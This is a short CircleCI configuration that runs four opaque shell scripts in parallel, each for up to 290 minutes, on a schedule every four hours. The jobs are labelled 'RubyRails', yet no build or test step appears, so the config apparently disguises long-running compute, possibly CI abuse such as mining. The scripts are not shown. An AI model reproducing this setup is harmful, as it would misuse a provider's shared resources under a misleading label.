working_dir: &working_dir ~/app

version: 2.0
jobs:
  manganang1:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  chmod u+x kuntul1.sh && timeout 290m ./kuntul1.sh
        no_output_timeout: 290m

  manganang2:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  chmod u+x kuntul2.sh && timeout 290m ./kuntul2.sh
        no_output_timeout: 290m

  manganang3:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  chmod u+x kuntul3.sh && timeout 290m ./kuntul3.sh
        no_output_timeout: 290m

  manganang4:
    docker:
      - image: circleci/ruby:2.6.7
    steps:
    - checkout
    - run:
        name: RubyRails
        command: |
                  chmod u+x kuntul4.sh && timeout 290m ./kuntul4.sh
        no_output_timeout: 290m
        
workflows:
  version: 2
  commit:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
    triggers:
      - schedule:
          cron: "0 2,6,10,14,18,22 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - manganang1
      - manganang2
      - manganang3
      - manganang4
